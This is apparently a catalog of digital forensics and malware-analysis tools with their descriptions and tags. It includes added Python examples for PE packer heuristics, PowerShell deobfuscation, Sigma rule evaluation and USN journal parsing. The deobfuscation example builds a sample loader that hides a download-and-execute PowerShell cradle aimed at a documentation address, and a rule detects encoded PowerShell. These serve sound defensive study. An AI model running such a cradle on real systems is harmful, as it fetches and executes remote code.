PE-sieve GitHub Release Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches). pe-analysis, malware-analysis, dynamic-analysis .exe, .dll
PE-utils GitHub Release A set of small utilities, helpers for PIN tracers. pe-analysis, reverse-engineering .exe, .dll, .sys
peepdf-3 Python A Python 3 tool to explore, analyse, and disassemble PDF files pdf, malware-analysis, javascript .pdf
pefile Python pe-analysis, reverse-engineering .exe, .dll, .sys
pestudio HTTP pestudio is a tool for analyzing PE files. pe-analysis, malware-analysis, static-analysis .exe, .dll, .sys
peutils Python pe-analysis, packer-detection .exe, .dll
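Added example (editor's code, not code from pefile, peutils or pestudio): a standard-library walk of the PE headers and section table, followed by the packer heuristics those tools report, namely per-section entropy, UPX-style section names, writable-and-executable sections and an entry point outside .text. The sample image, its section contents, the field names and the 7.0 entropy threshold are constructed for illustration; the header layout and section flag bits are the documented PE values.

```python
"""Parse PE headers and apply packer heuristics with the standard library only."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def shannon_entropy(data):
    """Bits per byte; compressed, encrypted or random data approaches 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(data):
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24                                      # signature (4) + COFF header (20)
    magic = struct.unpack_from("<H", data, opt_off)[0]           # 0x10B = PE32, 0x20B = PE32+
    entry = struct.unpack_from("<I", data, opt_off + 16)[0]      # AddressOfEntryPoint (RVA)
    sections, sec_off = [], opt_off + opt_size
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, sec_off + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw_size": rawsize, "flags": flags,
                         "entropy": shannon_entropy(raw)})
    return {"machine": machine, "timestamp": stamp, "magic": magic,
            "entry_point": entry, "sections": sections}


def entry_section(pe):
    ep = pe["entry_point"]
    for s in pe["sections"]:
        if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw_size"]):
            return s
    return None


def packer_indicators(pe):
    """Heuristics only: each hit is a reason to look closer, not a verdict."""
    hits = []
    for s in pe["sections"]:
        if s["entropy"] > 7.0:   # constructed threshold; tune against your own corpus
            hits.append(f"section {s['name']!r} entropy {s['entropy']:.2f} (packed or encrypted data)")
        if s["name"].upper().startswith("UPX"):
            hits.append(f"section name {s['name']!r} is a UPX stub name")
        if s["flags"] & IMAGE_SCN_MEM_WRITE and s["flags"] & IMAGE_SCN_MEM_EXECUTE:
            hits.append(f"section {s['name']!r} is writable and executable")
    sec = entry_section(pe)
    if sec is None:
        hits.append("entry point lies outside every section")
    elif sec["name"] != ".text":
        hits.append(f"entry point 0x{pe['entry_point']:x} is in {sec['name']!r}, not .text")
    return hits


def build_sample_pe(sections, entry_rva):
    """Constructed PE32 header skeleton (not a runnable program): DOS stub, COFF and
    optional headers, one section header per (name, data, flags), raw data 0x200-aligned."""
    e_lfanew, opt_size = 0x40, 224
    raw_ptr = (e_lfanew + 24 + opt_size + 40 * len(sections) + 0x1FF) & ~0x1FF
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x5F000000, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    table, body, va = b"", b"", 0x1000
    for name, data, flags in sections:
        padded = data + b"\0" * (-len(data) % 0x200)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data), va,
                             len(padded), raw_ptr + len(body), 0, 0, 0, 0, flags)
        body += padded
        va += (len(data) + 0xFFF) & ~0xFFF
    image = dos + b"PE\0\0" + coff + bytes(opt) + table
    return bytes(image + b"\0" * (raw_ptr - len(image)) + body)


# Constructed sample: a low-entropy .text and a UPX1 section of deterministic
# pseudo-random bytes standing in for a compressed payload; entry point in UPX1.
_CODE = b"\x55\x8b\xec\x90\xc3" * 200
_PACKED = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
SAMPLE_PE = build_sample_pe([(".text", _CODE, 0x60000020), ("UPX1", _PACKED, 0xE0000040)],
                            entry_rva=0x2010)

if __name__ == "__main__":
    pe = parse_pe(SAMPLE_PE)
    for s in pe["sections"]:
        print(f"{s['name']:<8} va=0x{s['va']:05x} raw={s['raw_size']:>5} entropy={s['entropy']:.2f}")
    for hit in packer_indicators(pe):
        print("!", hit)
```

Entropy is computed over SizeOfRawData bytes, as pefile does, so zero padding at the end of a section pulls the figure down slightly; compare against a corpus of known-good binaries before treating any single number as meaningful.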
pfp Python binary-analysis, file-analysis .bin
PHP HTTP PHP is a scripting language widely used for web development. scripting, web .php
PowerDecode Git PowerDecode is a PowerShell-based tool that deobfuscates PowerShell scripts obfuscated across multiple layers. The tool performs dynamic code analysis, extracting malware-hosting URLs and checking the HTTP response. It can also detect whether the malware attempts to inject shellcode into memory. powershell, deobfuscation, malware-analysis
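Added example, not PowerDecode's own code: the layer-peeling step such a tool performs, written against the standard library. It decodes the UTF-16LE base64 behind -EncodedCommand, then the gzip-or-deflate plus base64 stage inside it, and pulls URL indicators out of every layer without executing anything and without contacting the URL (the page's tool checks the HTTP response; this example deliberately does not). The loader chain is constructed in the block itself, and 203.0.113.10 is a TEST-NET-3 documentation address, not a real host.

```python
"""Peel base64 / UTF-16LE / gzip layers off a PowerShell loader and collect URLs."""
import base64
import gzip
import re
import zlib

ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def _is_mostly_text(blob):
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in blob)
    return len(blob) > 0 and printable / len(blob) > 0.9


def _decompress(blob):
    """Undo a gzip or raw-deflate stage; return the input unchanged if it is neither."""
    if blob[:2] == b"\x1f\x8b":
        try:
            return gzip.decompress(blob)
        except (OSError, EOFError, zlib.error):
            return blob
    try:
        out = zlib.decompress(blob, wbits=-15)   # raw deflate has no magic, so just try it
    except zlib.error:
        return blob
    return out if _is_mostly_text(out) else blob


def _to_text(blob):
    """-EncodedCommand payloads are UTF-16LE: every odd byte of ASCII text is 0."""
    if len(blob) >= 2 and not any(blob[1:64:2]):
        return blob.decode("utf-16-le", "replace")
    return blob.decode("utf-8", "replace")


def peel(script, max_layers=10):
    """Return [original, stage 1, stage 2, ...], stopping when nothing more decodes."""
    layers = [script]
    for _ in range(max_layers):
        current = layers[-1]
        m = ENC_RE.search(current)
        candidates = [m.group(1)] if m else B64_RE.findall(current)
        if not candidates:
            break
        try:
            raw = base64.b64decode(max(candidates, key=len), validate=True)
        except ValueError:
            break
        text = _to_text(_decompress(raw))
        if text == current or not _is_mostly_text(text.encode("utf-8", "replace")):
            break
        layers.append(text)
    return layers


def extract_urls(layers):
    return {u for layer in layers for u in URL_RE.findall(layer)}


# Constructed sample chain: stage 2 is gzip+base64 inside stage 1, which sits
# UTF-16LE+base64-encoded behind -Enc. The URL uses a documentation range.
INNER = "$u='http://203.0.113.10/stage2.ps1'; IEX (New-Object Net.WebClient).DownloadString($u)"
_STAGE1 = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
           "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('"
           + base64.b64encode(gzip.compress(INNER.encode())).decode()
           + "'))),[IO.Compression.CompressionMode]::Decompress)),"
           "[Text.Encoding]::ASCII)).ReadToEnd()")
SAMPLE_COMMAND = ("powershell.exe -NoP -W Hidden -Enc "
                  + base64.b64encode(_STAGE1.encode("utf-16-le")).decode())

if __name__ == "__main__":
    found = peel(SAMPLE_COMMAND)
    for depth, layer in enumerate(found):
        print(f"--- layer {depth} ({len(layer)} chars)\n{layer[:120]}")
    print("URLs:", sorted(extract_urls(found)))
```

Static peeling stops where a loader derives its next stage at run time (string concatenation, -f formatting, character arithmetic); that is the point at which a dynamic approach such as PowerDecode's takes over.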
PowerShell GitHub Release PowerShell is a task automation and configuration management framework from Microsoft. scripting, shell, automation .ps1, .psm1, .psd1
PowerShell 7 Winget PowerShell 7 is a cross-platform shell and scripting language that provides a powerful command-line interface and automation capabilities. scripting, shell, automation .ps1, .psm1, .psd1
PowerSponse Git PowerSponse is a PowerShell module focused on targeted containment and remediation during incident response. incident-response, powershell
ppdeep Python hashing, fuzzy-hashing, binary-diffing
Prefetch Browser GitHub Release Prefetch Browser is a tool for analyzing Windows Prefetch files, which can provide valuable information about program execution and system activity. windows, forensics, filesystem .pf
prettytable Python data-processing
ProcDOT HTTP ProcDOT is a visual malware analysis tool for process, file, and network activity. malware-analysis, visualization, dynamic-analysis .csv, .log Full only
protodeep Python A tool to help reversing protobuf. parsing, reverse-engineering .bin
psexposed Git Community-driven PowerShell detection indicators windows, forensics .ps1
PST Walker HTTP PST Walker is a tool for analyzing PST files. email, forensics .pst
ptpython Python Python REPL built on top of prompt_toolkit. python, scripting .py
PuTTY Winget PuTTY is a free and open-source terminal emulator and SSH client for Windows. It is used to connect to remote systems via SSH, Telnet, and other protocols. network, terminal Full only
pwncat Python Netcat on steroids with firewall and IDS/IPS evasion, bind and reverse shells and port-forwarding magic; it is fully scriptable with Python (PSE). exploitation, security-testing
pyasn1 Python
pycares Python network, dns
pycryptodome Python encryption, cryptography
pydivert Python network, pcap .pcap
pyghidra Python The PyGhidra Python library, originally developed by the Department of Defense Cyber Crime Center (DC3) under the name "Pyhidra", is a Python library that provides direct access to the Ghidra API within a native CPython 3 interpreter using JPype. PyGhidra contains some conveniences for setting up analysis on a given sample and running a Ghidra script locally. It also contains a Ghidra plugin to allow the use of CPython 3 from the Ghidra GUI. reverse-engineering, decompiler, scripting .exe, .dll, .elf
pyOneNote Python office, data-extraction .one
pypdf Python pdf, data-extraction .pdf
pypng Python steganography .png
PyrsistenceSniper Python Point it at a KAPE dump, a Velociraptor collection, or a mounted disk image and get offline Windows persistence detection in seconds. No live system access, no admin privileges, no PowerShell. Runs on Windows, Linux, and macOS because investigators don't always get to pick their workstation. malware-analysis, forensics, ioc, data-extraction, enrichment
pyshark Python network-analysis, pcap, protocol-analysis .pcap, .pcapng
pysigma-backend-elasticsearch Python sigma, detection, log-analysis, search .yml, .yaml
pySigma-backend-loki Python sigma, detection .yml, .yaml
pysigma-backend-splunk Python sigma, detection, siem .yml, .yaml
pysigma-backend-sqlite Python sigma, detection, sqlite .yml, .yaml
pysigma-pipeline-sysmon Python sigma, detection, event-log, windows .yml, .yaml
pysigma-pipeline-windows Python sigma, detection, windows .yml, .yaml
PySocks Python network
Python 3.11 Installer Python is a programming language that lets you work quickly and integrate systems more effectively. python .py
python-docx Python office, data-extraction .docx
python-dotenv Python
Python-dsstore Git A library for parsing .DS_Store files and extracting file names forensics, macos, data-extraction .DS_Store
python-magic Python
python-registry Python registry, windows, forensics .reg, .dat
pyvis Python visualization, graph
pyzipper Python compression, encryption .zip
QEMU Winget QEMU is a generic and open-source machine emulator and virtualizer. It can be used to run operating systems and applications for different architectures on a host system, making it useful for testing, development, and analysis. emulation .qcow2, .vmdk, .vdi, .img, .iso Full only
qpdf GitHub Release qpdf: A content-preserving PDF document transformer pdf, data-processing .pdf
qrtool GitHub Release Tool for decoding QR codes from images encoding, decoding .png, .svg
quickadd GitHub Release Obsidian quickadd plugin. markdown, automation, plugins Full only
r2ai Git Native AI plugin for radare2. Compiled from source in the MSYS2 sandbox using gcc and pkg-config. Provides AI-assisted analysis using local and remote language models. reverse-engineering, ai .exe, .dll, .elf, .bin, .so
r2ai GitHub Release LLM-based reversing for radare2. reverse-engineering, mcp, ai .exe, .dll, .elf, .bin, .so
Radare2 GitHub Release UNIX-like reverse engineering framework and command-line toolset reverse-engineering, disassembler, debugging .exe, .dll, .elf, .bin, .so, .mach-o
radare2-deep-graph Git A Cutter plugin to generate radare2 graphs. reverse-engineering, visualization, plugins
radare2-mcp GitHub Release MCP stdio server for radare2. Enables AI assistants to interact with radare2 for binary analysis. Known issue: Windows binary may crash with stack overflow (GitHub issue #24). reverse-engineering, mcp, ai .exe, .dll, .elf, .bin, .so
RdpCacheStitcher Git RdpCacheStitcher is a tool that supports forensic analysts in reconstructing useful images out of RDP cache bitmaps. forensics, network, windows, disk-forensics
RDPCacheStitcher GitHub Release RdpCacheStitcher is a tool for analyzing RDP cache files. network, forensics, windows .bmc, .bin
readpe GitHub Release The PE file analysis toolkit pe-analysis, reverse-engineering .exe, .dll, .sys
Recaf GitHub Release Recaf is a modern Java bytecode editor. reverse-engineering, java, decompiler, deobfuscation .class, .jar Full only
recbin HTTP recbin parses Windows Recycle Bin files. binary-analysis, carving .bin
redress GitHub Release Redress - A tool for analyzing stripped Go binaries. reverse-engineering, golang .exe, .elf
regipy Python Regipy is a python library for parsing offline registry hives. registry, windows, forensics .reg, .dat
regipy-mcp-server Git regipy repository including regipy MCP server for AI-assisted registry analysis. registry, windows, forensics, mcp .reg, .dat
RegShot Git RegShot is a small, free and open-source registry compare utility.
requests Python network, http
Resource Hacker HTTP Resource Hacker is a tool for viewing and editing resources in Windows executables. pe-analysis, reverse-engineering .exe, .dll, .res
rexi Python search, data-processing, tui
ripgrep GitHub Release ripgrep is a fast, modern, and user-friendly command-line search tool. search, cli
RpcView GitHub Release RpcView is a tool to view RPC endpoints. network, windows
Ruby Winget Ruby is a dynamic, open-source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write. scripting .rb Full only
Rust Installer Rust programming language.
rzpipe Python reverse-engineering, scripting .exe, .dll, .elf, .bin
scapy Python network-analysis, pcap, security-testing .pcap, .pcapng
scare Git A multi-arch assembly REPL and emulator for your command line. reverse-engineering, emulation, scripting
Shadow-Pulse Git Information about ransomware groups (Ransomware Analysis Notes) threat-intelligence, ioc
shodan Python osint, network
sidr GitHub Release Search Index Database Reporter browser-forensics, forensics .db, .sqlite
sigma Git Main Sigma Rule Repository sigma, detection-rules, siem
sigma-cli Python sigma, detection, log-analysis .yml, .yaml
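Added example, independent of pySigma, sigma-cli and the pysigma-backend-*/pysigma-pipeline-* packages listed above: the mechanism those packages implement, in plain Python. It parses a rule's condition into a tree, applies a field-mapping pipeline, emits a Splunk-style search from the tree, and evaluates the same tree over sample events so the query and the detection logic can be checked against each other. The rule, the mapping and the events are constructed; the query shape is an illustration, not the real backend's exact rendering, and the `1 of selection*` quantifiers Sigma also allows are out of scope.

```python
"""Sigma-style rule: condition parser, pipeline field mapping, query emitter, evaluator."""
import re

# Constructed rule, held as a dict rather than YAML so only the standard library is needed.
RULE = {
    "title": "Encoded PowerShell command line",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {"Image|endswith": "\\powershell.exe",
                      "CommandLine|contains": ["-enc", "-EncodedCommand"]},
        "filter": {"ParentImage|endswith": "\\ccmexec.exe"},
        "condition": "selection and not filter",
    },
}
# Constructed mapping standing in for a processing pipeline: generic Sigma field
# names on the left, the names the target index actually stores on the right.
PIPELINE = {"Image": "process.executable", "ParentImage": "process.parent.executable",
            "CommandLine": "process.command_line"}


def parse_condition(text):
    """Recursive-descent parse of e.g. 'a and (b or not c)' into nested tuples."""
    tokens, pos = re.findall(r"\(|\)|\w+", text), 0

    def take():
        nonlocal pos
        pos += 1
        return tokens[pos - 1]

    def peek():
        return tokens[pos] if pos < len(tokens) else None

    def expr():                       # 'or' binds loosest
        node = term()
        while peek() == "or":
            take()
            node = ("or", node, term())
        return node

    def term():                       # 'and'
        node = factor()
        while peek() == "and":
            take()
            node = ("and", node, factor())
        return node

    def factor():                     # 'not', parentheses, or a selection name
        tok = take()
        if tok == "not":
            return ("not", factor())
        if tok == "(":
            node = expr()
            if take() != ")":
                raise ValueError("unbalanced parentheses")
            return node
        return ("sel", tok)

    tree = expr()
    if pos != len(tokens):
        raise ValueError(f"unexpected token {tokens[pos]!r}")
    return tree


def _field(key):
    name, _, mod = key.partition("|")
    return name, mod or "equals"


def _match(mod, actual, expected):
    if actual is None:
        return False
    a, e = str(actual).lower(), str(expected).lower()   # Sigma string matching is case-insensitive
    return {"equals": a == e, "contains": e in a,
            "startswith": a.startswith(e), "endswith": a.endswith(e)}[mod]


def selection_matches(selection, event):
    """Fields within one selection are ANDed; a list of values for one field is ORed."""
    for key, expected in selection.items():
        field, mod = _field(key)
        values = expected if isinstance(expected, list) else [expected]
        if not any(_match(mod, event.get(field), v) for v in values):
            return False
    return True


def evaluate(node, detection, event):
    if node[0] == "sel":
        return selection_matches(detection[node[1]], event)
    if node[0] == "not":
        return not evaluate(node[1], detection, event)
    left, right = (evaluate(n, detection, event) for n in node[1:])
    return (left and right) if node[0] == "and" else (left or right)


def _quote(value):
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def to_splunk(node, detection, pipeline):
    """Emit a Splunk-style search; wildcards stand in for the Sigma modifiers."""
    if node[0] == "sel":
        clauses = []
        for key, expected in detection[node[1]].items():
            field, mod = _field(key)
            field = pipeline.get(field, field)
            shape = {"equals": "{}", "contains": "*{}*", "startswith": "{}*", "endswith": "*{}"}[mod]
            values = expected if isinstance(expected, list) else [expected]
            alts = " OR ".join(f"{field}={_quote(shape.format(v))}" for v in values)
            clauses.append(f"({alts})" if len(values) > 1 else alts)
        return "(" + " ".join(clauses) + ")"
    if node[0] == "not":
        return "NOT " + to_splunk(node[1], detection, pipeline)
    joiner = " " if node[0] == "and" else " OR "
    return "(" + joiner.join(to_splunk(n, detection, pipeline) for n in node[1:]) + ")"


def run_rule(rule, events):
    """Indexes of the events the rule fires on."""
    tree = parse_condition(rule["detection"]["condition"])
    return [i for i, ev in enumerate(events) if evaluate(tree, rule["detection"], ev)]


# Constructed Sysmon-style process creation events.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe",   # removed by the filter selection
     "CommandLine": "powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c whoami"},
]
```

Running `run_rule(RULE, EVENTS)` alongside `to_splunk(...)` is the useful habit: if the emitted query and the in-process evaluator disagree on the same sample events, the backend or pipeline mapping is wrong, not the rule.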
signature-base Git YARA signature and IOC database for my scanners and tools. yara, detection-rules, ioc .yara
simplejson Python json, data-processing .json
Sleuthkit GitHub Release The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence. disk-forensics, filesystem, forensics .dd, .raw, .E01, .img, .vmdk
SmartDeblur Git SmartDeblur is a tool for restoring defocused and blurred images. It can be used to recover details from images that are out of focus or have motion blur. image-restoration, forensics
Snort Rules Enrichment Snort 3 community ruleset for network intrusion detection. ids, detection-rules, network .rules, .tar.gz
speakeasy Python Windows malware emulation framework that executes binaries, drivers, and shellcode in a modeled Windows runtime without a full VM. Produces structured JSON reports. malware-analysis, emulation, shellcode, reverse-engineering, windows .exe, .dll, .sys, .bin
sqlit-tui Python database, sqlite, tui .db, .sqlite, .sqlite3
SQLite Tools HTTP SQLite command-line tools. database, sqlite, cli .db, .sqlite, .sqlite3
srum_dump GitHub Release A forensics tool to convert the data in the Windows srum (System Resource Usage Monitor) database to an xlsx spreadsheet. windows, forensics, filesystem .dat
SSC-Threat-Intel-IoCs Enrichment SecurityScorecard threat intelligence indicators of compromise. threat-intelligence, ioc
SSHniff Cargo SSHniff is a command-line tool for capturing and analyzing SSH network traffic. It can be used to monitor and inspect SSH sessions, helping in forensic analysis of network communications. network-analysis, ssh, pcap .pcap, .pcapng
stego-lsb Python steganography, audio .png, .bmp, .wav
Strawberry Perl GitHub Release Strawberry Perl is a Perl distribution for Windows that includes a complete Perl environment. scripting .pl, .pm Full only
Suricata Rules Enrichment Emerging Threats open ruleset for Suricata IDS. ids, detection-rules, network .rules, .zip
Sysinternals Suite HTTP Sysinternals Suite is a collection of utilities for Windows. windows, debugging, monitoring .exe, .dll, .sys
Tailscale Winget Tailscale is a modern VPN solution that allows you to create secure, private networks between your devices. It is designed to be easy to use and can be used for remote access, secure file sharing, and connecting devices across different networks. network Full only
takajo GitHub Release Takajō (鷹匠) is a Hayabusa results analyzer. log-analysis, timeline .json
Templater GitHub Release Obsidian templater plugin. markdown, automation, plugins Full only
termcolor Python terminal
textsearch Python data-processing, search
threat-intel Git Signatures and IoCs from public Volexity blog posts. threat-intelligence, ioc
Thumbcacheviewer GitHub Release Thumbcache Viewer - Extract Windows Vista, Windows 7, Windows 8, Windows 8.1, and Windows 10 thumbcache database files. windows, forensics, metadata .db
time-decode Python metadata, forensics, decoding
tomlkit Python parsing, data-processing .toml
ToolAnalysisResultSheet Git This repository summarizes the results of examining the logs Windows records when each of 49 tools likely to be used by an attacker who has infiltrated a network is executed. forensics, documentation, security-testing .evtx
toolong Python log-analysis, tui .log, .txt
Tor Browser HTTP Tor Browser is a privacy-focused web browser based on Firefox. browser, network .html, .htm Full only
TOR Exit Nodes Enrichment TOR exit node lists from the Tor Project collector archive. blocklist, network, threat-intelligence
TotalRecall Git This tool extracts and displays data from the Recall feature in Windows 11, providing an easy way to access information about your PC's activity snapshots. windows, forensics
Trawler Git PowerShell script helping Incident Responders discover potential adversary persistence mechanisms. windows, malware-analysis, threat-hunting
treelib Python data-processing, filesystem
TrID HTTP TrID is a file identifier utility. file-analysis
ULogViewer GitHub Release ULogViewer is a log viewer for ULog files. log-analysis, viewer .exe, .dll
unicorn Python reverse-engineering, emulation
unpy2exe Python reverse-engineering, python, decompiler .exe
upx GitHub Release UPX is a free, portable, extendable, high-performance executable packer. packer-detection, pe-analysis, compression .exe, .dll, .elf
usnjrnl Cargo The usnjrnl tool is a command-line utility for parsing Windows UsnJrnl files. It allows you to extract and analyze information from the USN Journal, which is a feature of the NTFS file system that tracks changes to files and directories. This tool can be useful for forensic investigations and understanding file system activity. filesystem, forensics, ntfs, windows .bin
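Added example, not the usnjrnl tool's code: a USN_RECORD_V2 parser for a $UsnJrnl:$J extract, written against the standard library, that decodes FILETIME stamps, reason flags and the MFT entry/sequence split of file reference numbers, and skips the zero-filled sparse region at the start of the journal. The journal bytes are constructed by the block itself (the record layout and reason bit values are the documented NTFS ones; the file names, entry numbers and timestamps are invented).

```python
"""Parse USN_RECORD_V2 entries from a $UsnJrnl:$J extract."""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
RECORD_V2 = struct.Struct("<IHHQQqqIIIIHH")   # 60-byte fixed part; UTF-16LE name follows
REASONS = {
    0x00000001: "DATA_OVERWRITE", 0x00000002: "DATA_EXTEND", 0x00000004: "DATA_TRUNCATION",
    0x00000100: "FILE_CREATE", 0x00000200: "FILE_DELETE", 0x00000800: "SECURITY_CHANGE",
    0x00001000: "RENAME_OLD_NAME", 0x00002000: "RENAME_NEW_NAME", 0x00008000: "BASIC_INFO_CHANGE",
    0x00010000: "HARD_LINK_CHANGE", 0x00100000: "REPARSE_POINT_CHANGE", 0x80000000: "CLOSE",
}


def filetime_to_datetime(ft):
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def decode_reasons(mask):
    """Known flags in bit order, then any unknown bits as hex so nothing is silently dropped."""
    names = [name for bit, name in sorted(REASONS.items()) if mask & bit]
    unknown = mask & ~sum(REASONS)
    return names + ([f"0x{unknown:08x}"] if unknown else [])


def parse_usn_journal(data):
    """Walk the journal; skip sparse zero runs and records of a version this parser does not handle."""
    records, off = [], 0
    while off + RECORD_V2.size <= len(data):
        length = struct.unpack_from("<I", data, off)[0]
        if length == 0:                         # sparse/zeroed region; records are 8-byte aligned
            off += 8
            continue
        if length < RECORD_V2.size or off + length > len(data):
            raise ValueError(f"corrupt record length {length} at offset {off}")
        (_, major, _, frn, parent_frn, usn, ft, reason, _source, _sid,
         attrs, name_len, name_off) = RECORD_V2.unpack_from(data, off)
        if major == 2:                          # V3/V4 use 128-bit references; not handled here
            name = data[off + name_off:off + name_off + name_len].decode("utf-16-le", "replace")
            records.append({"usn": usn, "timestamp": filetime_to_datetime(ft),
                            "mft_entry": frn & 0xFFFFFFFFFFFF, "sequence": frn >> 48,
                            "parent_entry": parent_frn & 0xFFFFFFFFFFFF,
                            "reasons": decode_reasons(reason), "attributes": attrs, "name": name})
        off += length
    return records


def build_record(usn, entry, seq, parent, when, reason, attrs, name):
    """Constructed V2 record for the sample journal below."""
    name_b = name.encode("utf-16-le")
    length = (RECORD_V2.size + len(name_b) + 7) & ~7
    header = RECORD_V2.pack(length, 2, 0, (seq << 48) | entry, (1 << 48) | parent, usn,
                            datetime_to_filetime(when), reason, 0, 0, attrs, len(name_b),
                            RECORD_V2.size)
    return header + name_b + b"\0" * (length - RECORD_V2.size - len(name_b))


# Constructed journal: create, write, rename and delete of one file in one directory.
T0 = datetime(2024, 3, 5, 9, 41, 7, tzinfo=timezone.utc)
DOWNLOADS = 1234   # invented MFT entry number of the parent directory
_EVENTS = [
    (T0, 0x00000100, "invoice.docm"),                                   # FILE_CREATE
    (T0 + timedelta(seconds=2), 0x80000002, "invoice.docm"),            # DATA_EXTEND|CLOSE
    (T0 + timedelta(minutes=3), 0x00001000, "invoice.docm"),            # RENAME_OLD_NAME
    (T0 + timedelta(minutes=3), 0x00002000, "~WRD0001.tmp"),            # RENAME_NEW_NAME
    (T0 + timedelta(minutes=3, seconds=1), 0x80000200, "~WRD0001.tmp"), # FILE_DELETE|CLOSE
]
SAMPLE_JOURNAL = b"\0" * 16 + b"".join(
    build_record(0x1000 + 88 * i, 5013, 7, DOWNLOADS, when, reason, 0x20, name)
    for i, (when, reason, name) in enumerate(_EVENTS))

if __name__ == "__main__":
    for r in parse_usn_journal(SAMPLE_JOURNAL):
        print(f"{r['timestamp'].isoformat()} entry={r['mft_entry']}-{r['sequence']} "
              f"parent={r['parent_entry']} {r['name']:<14} {'|'.join(r['reasons'])}")
```

The MFT entry number on its own is not a stable identifier: after deletion the entry is reused with an incremented sequence number, so join journal records to $MFT on entry and sequence together. Rename pairs share an entry number and a timestamp, with the old and new name in consecutive records.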
uv Installer uv is a fast Python package installer and manager. It can be used to create and manage virtual environments, install packages, and run Python scripts. It is designed to be a faster and more efficient alternative to pip and virtualenv. python .py
Velociraptor GitHub Release Velociraptor is an advanced digital forensic and incident response tool that enhances your visibility into your endpoints. incident-response, forensics, endpoint-detection .json, .csv Full only
Velociraptor Artifact Exchange HTTP The artifact exchange is a place for sharing community-contributed artifacts for Velociraptor. forensics, incident-response
VeraCrypt HTTP VeraCrypt is a disk encryption tool. encryption, disk-forensics .hc, .tc Full only
VirusTotal CLI Winget VirusTotal CLI is a command-line tool for interacting with VirusTotal, allowing you to analyze files and URLs for malware and other threats. malware-analysis, threat-intelligence, ioc-scanner Full only
visidata Python data-processing, tui, csv .csv, .tsv, .json, .sqlite, .xlsx
Visual Studio Code HTTP Visual Studio Code is a source-code editor. text-editor, code-editor, powershell .ps1, .py, .js, .ts, .json, .xml, .yaml, .md
VLC Winget VLC is a versatile media player that supports a wide range of audio and video formats. It can be used for playing media files, streaming content, and even basic media conversion tasks. audio .mp4, .avi, .mkv, .mov, .mp3, .wav, .flac Full only
Volatility Workbench 2.1 HTTP Volatility Workbench is a GUI for the Volatility memory analysis framework. memory-forensics, gui .dmp, .raw, .vmem, .img Full only
Volatility Workbench 3 HTTP Volatility Workbench is a GUI for the Volatility memory analysis framework. memory-forensics, gui .dmp, .raw, .vmem, .img Full only
Volexity Threat Intel Enrichment Volexity threat intelligence indicators and YARA rules. threat-intelligence, ioc
VS Code PowerShell Extension GitHub Release Visual Studio Code PowerShell extension. text-editor, powershell, plugins .ps1, .psm1, .psd1
VS Code Spell Checker GitHub Release Visual Studio Code Spell Checker extension. text-editor, plugins
vscode-shellcheck GitHub Release Shellcheck extension for VS Code. text-editor, scripting, plugins Full only
White-Phoenix Git A tool to recover content from files encrypted with intermittent encryption ransomware, decryption, data-recovery Full only
white-phoenix Python White-Phoenix is a tool that recovers content from files encrypted by Ransomware using intermittent encryption. It is designed to help incident responders and forensic analysts to retrieve data from encrypted files when the decryption key is not available. ransomware, encryption, decryption, forensics, data-recovery .encrypted, .locked, .enc
Win API Search HTTP Win API Search is a tool for searching Windows API functions. reverse-engineering, windows
